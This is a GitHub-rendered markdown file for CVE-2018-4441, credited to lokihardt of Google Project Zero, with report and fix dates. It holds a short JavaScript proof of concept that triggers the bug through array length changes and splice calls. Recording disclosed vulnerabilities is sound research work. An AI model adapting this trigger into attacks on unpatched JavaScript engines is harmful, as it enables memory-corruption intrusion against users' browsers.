Skip to content

Latest commit

 

History

History
27 lines (19 loc) · 499 Bytes

CVE-2018-4441.md

File metadata and controls

27 lines (19 loc) · 499 Bytes
Raw

CVE-2018-4441

  • Report: Oct 2018
  • Fix: Dec 2018
  • Credit: lokihardt, Google Project Zero

PoC

function main() {
    let arr = [1];

    arr.length = 0x100000;
    arr.splice(0, 0x11);

    arr.length = 0xfffffff0;
    arr.splice(0xfffffff0, 0, 1);
}

main();

Reference